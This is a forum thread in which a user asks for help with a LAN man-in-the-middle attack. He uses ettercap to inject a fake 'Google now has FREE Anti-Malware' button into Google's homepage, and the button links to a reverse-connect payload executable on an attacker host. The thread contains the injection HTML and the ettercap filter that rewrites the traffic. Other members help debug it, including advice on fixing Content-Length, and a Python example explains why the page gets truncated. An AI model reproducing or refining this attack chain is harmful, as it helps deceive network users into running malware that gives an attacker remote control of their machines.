Thread: How does Google render

  1. #1
    JF1976 (Junior Member; joined Jan 2010; Kings Lynn, Norfolk UK; 31 posts)

    How does Google render

    Hi all,

    I hope this is the right place to ask this. I've been working on an attack vector for LAN clients that involves injecting extra HTML, using ettercap, into the Google main index page, but rendering never quite works after the injection. I have reviewed the filter and feel that all should be OK, apart from that when I look closer at Google's code the page looks to be checked, or to be running scripts that are broken by the filter?

    So my main question is: "what would be the best way to inject HTML into this page and others?"

    Thanks.

  2. #2
    lupin (Super Moderator; joined Jan 2010; 2,943 posts)

    Quote Originally Posted by jf1976:
    Hi all,

    I hope this is the right place to ask this. I've been working on an attack vector for LAN clients that involves injecting extra HTML, using ettercap, into the Google main index page, but rendering never quite works after the injection. I have reviewed the filter and feel that all should be OK, apart from that when I look closer at Google's code the page looks to be checked, or to be running scripts that are broken by the filter?

    So my main question is: "what would be the best way to inject HTML into this page and others?"

    Thanks.
    So what does happen in the browser when you do this? Blank screen? Garbled output?

    Are you sure the HTML you are inserting is valid? If you save it to a file and open it in a browser does it render properly then?

    Have you tried doing a single character replacement (with the response staying the same size) to see if that works?

    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  3. #3
    JF1976 (Junior Member; joined Jan 2010; Kings Lynn, Norfolk UK; 31 posts)

    Injection works, but I needed to insert a new line into the code, as this breaks other lines and drops the code off the page. I've tried placing the code into different parts, but no matter what happens I don't get the results I'm after.

    The inject is a button + text and provides a link to an mspayload with a reverse connect, using a standard DATA.data search & replace via ettercap. If I save the HTML from Google and run the inject locally, the inject works a treat.

    Injection:
    Code:
    <p><h10>Google now has FREE Anti-Malware</h10><form action="http://192.168.1.68/google-scan.exe" method="link"><INPUT TYPE=submit value="Click here"></form></p>
    Filter:
    Code:
    # Client -> server: strip Accept-Encoding so the server answers with an
    # uncompressed body that the second rule can search.
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept.Nothing!");
        }
    }

    # Server -> client: rewrite the matched string in the response body.
    # The replacement is longer than the search string and the response's
    # Content-Length header is left untouched.
    if (ip.proto == TCP && tcp.src == 80) {
        if (search(DATA.data, ",pl:[]}};")) {
            replace(",pl:[]}};", ",pl:[]}\n }; My-New-Line \n");
            msg(" IN ");
        }
    }
    The search data
    ,pl:[]}};
    and the replace data
    ,pl:[]}\n }; My-New-Line \n
    are not really the problem; it's more about understanding how to reverse the page to confirm or rule out my guess that the code is self-checking.

    My first idea was that the 12 lines of code used the max char[255] and that this was causing the line breaks, but after injection of the new line I still get errors. This is about the only thing I've used ettercap for, and I am assuming that the above is valid.

    I have just rebuilt the filter for testing and changed the search and replace to start at </title>, and the resulting code for the site is on pastie.org:

    http://pastie.org/621565.js

    If you Ctrl+End to the last part you will see broken code:

    <a href="http://mail.google.com/mail/?hl=en&tab=wm" class=gb1

    So the question is: what are the limitations of ettercap?
    i.e. must the replacement be the same length....

    Does the code self-check?

    I just wondered if anyone else had tried LAN-based injection into a TRUSTED site to deploy payloads.

    Or if someone can point me in the right direction for page / code analysis when such problems arise.

  4. #4
    lupin (Super Moderator; joined Jan 2010; 2,943 posts)

    Quote Originally Posted by jf1976:
    So the question is: what are the limitations of ettercap?
    i.e. must the replacement be the same length....
    A lot of the examples I have seen seem to suggest so, and when I last used Ettercap my replacement data was the same size; however, post 27 below seems to indicate otherwise, that the replacement can be longer.

    http://forums.remote-exploit.org/bac...-filter-3.html

    Have you tried capturing the data that reaches the client in something like Wireshark and seeing if you can do a TCP Stream View on the data? This should give you a quick idea of whether the received packets are invalid in any way after receipt, which may stop them being read correctly by the browser.

    Quote Originally Posted by jf1976:
    Does the code self-check?
    Do you mean does the code of google.com check itself to see if it's valid before loading in a browser? I've never heard of a page doing this and don't know how it would be possible, unless all of the code to be displayed was generated through Javascript and it ran a crude checksum before displaying it. However, I don't believe this is the case for Google, because it loads fine with scripts disabled using NoScript.

    Why don't you try this using a page other than Google, maybe something simple you code yourself, just to see if the basic principle works. If it works with another page you will know that there may be something special about Google...
  5. #5
    Gitsnik (Very good friend of the forum; joined Jan 2010; The Crystal Wind; 851 posts)

    Quote Originally Posted by lupin:
    that the replacement can be longer.
    Even older versions of ettercap have this capability; one merely needs to calculate the HTTP length in the return header (and fix it appropriately).

    It has merely gotten easier, though, with later releases of etterfilter permitting things like += and -= to reduce the need for this.

    Definitely worth checking out.

    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
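An added illustration of the length problem raised in posts #4 and #5 (example code written for this thread, not from any poster or from ettercap): it parses a constructed HTTP response, applies the replacement from post #3 to the body while leaving the headers alone, and shows that the stale Content-Length makes the client discard the end of the page, which is the kind of truncated tail JF1976 sees.

```python
# Added example: compare an HTTP/1.1 response's declared Content-Length with its
# actual body size. A search-and-replace that lengthens the body without
# updating the header leaves the browser reading only the declared number of
# bytes, so the end of the page is silently cut off.
from __future__ import annotations


def split_response(raw: bytes) -> tuple[dict[str, str], bytes]:
    """Split a raw HTTP response into a lower-cased header dict and the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers: dict[str, str] = {}
    for line in head.split(b"\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return headers, body


def check_length(raw: bytes) -> dict:
    """Report declared vs. actual body size and the bytes a client would keep."""
    headers, body = split_response(raw)
    if "content-length" not in headers:
        return {"declared": None, "actual": len(body), "mismatch": False, "kept": body}
    declared = int(headers["content-length"])
    return {"declared": declared, "actual": len(body),
            "mismatch": declared != len(body), "kept": body[:declared]}


# Constructed sample, not captured traffic: a tiny stand-in for a page whose
# inline script ends with ",pl:[]}};" followed by a trailing link.
ORIGINAL_BODY = (b"<html><head><title>x</title><script>var a={q:1,pl:[]}};"
                 b"</script></head><body><a href=\"/mail\" class=gb1>Mail</a>"
                 b"</body></html>")
ORIGINAL = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
            b"Content-Length: " + str(len(ORIGINAL_BODY)).encode()
            + b"\r\n\r\n" + ORIGINAL_BODY)

# The thread's replacement (9 bytes -> 25 bytes), headers left unchanged.
TAMPERED = ORIGINAL.replace(b",pl:[]}};", b",pl:[]}\n }; My-New-Line \n")

if __name__ == "__main__":
    for label, resp in (("original", ORIGINAL), ("tampered", TAMPERED)):
        r = check_length(resp)
        print(label, "declared", r["declared"], "actual", r["actual"],
              "MISMATCH" if r["mismatch"] else "ok")
        print("  client keeps ...", r["kept"][-24:])
```

Responses sent with Transfer-Encoding: chunked carry their sizes in the body's chunk headers instead of Content-Length, so the same replacement corrupts a chunk size rather than the header, and a TCP stream view in Wireshark (post #4) is the quickest way to see which case applies.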
